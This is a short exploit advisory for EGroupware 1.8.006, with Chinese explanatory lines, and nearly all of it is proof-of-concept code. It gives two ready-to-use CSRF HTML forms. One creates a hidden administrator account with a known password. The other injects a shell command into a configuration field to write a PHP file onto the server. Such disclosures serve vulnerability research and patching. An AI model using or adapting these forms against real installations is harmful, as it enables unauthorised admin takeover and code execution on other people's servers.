EGroupware 1.8.006 - Multiple Vulnerabilities

1）简单的CSRF利用下面创建新的管理员登录“ImmuniWeb”和密码“ImmuniWeb”： <form action="http://[host]/index.php?menuaction=admin.uiaccounts.add_user" method="post" name="main"> <input type="hidden" name="account_lid" value="immuniweb"> <input type="hidden" name="account_status" value="A"> <input type="hidden" name="account_firstname" value="firstname"> <input type="hidden" name="account_lastname" value="lastname"> <input type="hidden" name="account_passwd" value="immuniweb"> <input type="hidden" name="account_passwd_2" value="immuniweb"> <input type="hidden" name="changepassword" value="1"> <input type="hidden" name="expires" value="2014/04/29"> <input type="hidden" name="never_expires" value="True"> <input type="hidden" name="account_email" value="test@test.com"> <input type="hidden" name="account_groups[]" value="-2"> <input type="hidden" name="account_primary_group" value="-2"> <input type="hidden" name="submit" value="Add"> <input type="submit" id="btn"> </form> 2）利用CSRF 写入php文件 <form action="http://[host]/index.php?menuaction=admin.uiconfig.index&appname=phpbrain" method="post" name="main"> <input type="hidden" name="newsettings[system]" value="echo immuniweb>1.php"> <input type="hidden" name="submit" value="Save"> <input type="submit" id="btn"> </form>